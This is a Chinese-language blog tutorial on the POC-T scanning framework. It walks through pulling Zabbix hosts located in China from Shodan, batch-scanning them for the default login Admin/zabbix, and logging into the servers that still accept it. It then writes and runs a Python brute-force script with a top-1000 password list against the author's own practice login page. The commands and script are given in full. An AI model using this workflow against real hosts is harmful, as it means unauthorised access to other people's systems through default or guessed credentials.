banner
肥皂的小屋

肥皂的小屋

github
steam
bilibili
douban
tg_channel

POC-T框架使用之扫描zabbix弱密码

框架使用#

python2.7环境使用

git clone https://github.com/Xyntax/POC-T
pip install -r requirement.txt
python POC-T.py:查看参数

常用参数:

  • -s: 指定要使用script文件夹里面的哪个脚本
  • -t: 指定线程数
  • -iS: 指定单个目标,ip 或者域名都可以
  • -iF: 指定多个目标 (文件),我们今天就用到这个参数
  • -aZ/aS/aG/aF: 使用钟馗之眼 /shodan/google 开发者 /fofa 功能,使用这些需要先配置 toolkit.conf
  • --limit: 在使用上面这些搜索引擎搜索数据时限定需要的目标数量
  • --update: 更新 POC-T

解析 shodan 下载的数据#

shodan搜索Zabbix country:"CN"获得zabbix数据,下载

cmd里安装pythonshodan模块解析下载下来的数据

(当然你也可以在命令行使用 shodan 直接进行搜索和下载数据)

pip install shodan
shodan parse --fields ip_str,port,org --separator , shodan-export.json_2.gz

image

shodan parse --fields ip_str,port --separator , shodan-export.json_2.gz > urls.txt

到处数据,打开urls.txt替换,:

POC-T 使用脚本批量扫描弱密码#

python POC-T.py -s zabbix-weakpass -t 100 -iF urls.txt

image

可以看到4年前的69个结果,目前还剩5个,使用弱密码Admin/zabbix登录

登上去发现都是空的了,不过没关系,只是抛砖引玉:

image

POC-T 使用自己写的脚本#

可以参考官方脚本编写教程

编写自定义脚本,只需要声明一个函数作为接口,没有其他任何限制.从此告别文档,无需记忆函数名和模板调用,使效率最大化.

我这里以前几天写的文章BruteForce_test 暴力破解练习Level-1为例子

安装http请求转换插件http-script-generator,请求右键

image

转换为python的代码如下:

image

没有放在POC-T框架里跑的效果如下:

image

那根据POC-T脚本编写规则,脚本编写如下:

(最开始放在POC-T框架里跑不出来,后面想了下是 python2.7 没有 format 等函数以及中文字符解码的问题)

# coding=utf-8
import requests


def poc(dict):
    try:
        paramsPost = {"name": "admin", "password": dict}
        headers = {"Connection": "close"}
        response = requests.post(
            "http://192.168.1.11/BruteForc_test/Loginl.php", data=paramsPost, headers=headers)
        if u"登陆成功" in response.content.decode('utf8'):
            return "login success,password:" + dict
    except:
        return False

使用top1000字典,设置10进程破解:

python POC-T.py -s BruteForce_test -t 10 -iF top1000.txt

image

还有一个小问题,如何成功之后立马退出而不是等待所有字典跑完,后面我知道了会更新在这里

现在你就拥有了一个多线程异步的框架,不用担心线程管理的等问题,而且它还有很多内置的脚本库

于是乎之前一直拖欠的phpmyadmin多线程爆破脚本也就迎刃而解了,我会更新到原文章里

参考文章:

本文完。

加载中...
此文章数据所有权由区块链加密技术和智能合约保障仅归创作者所有。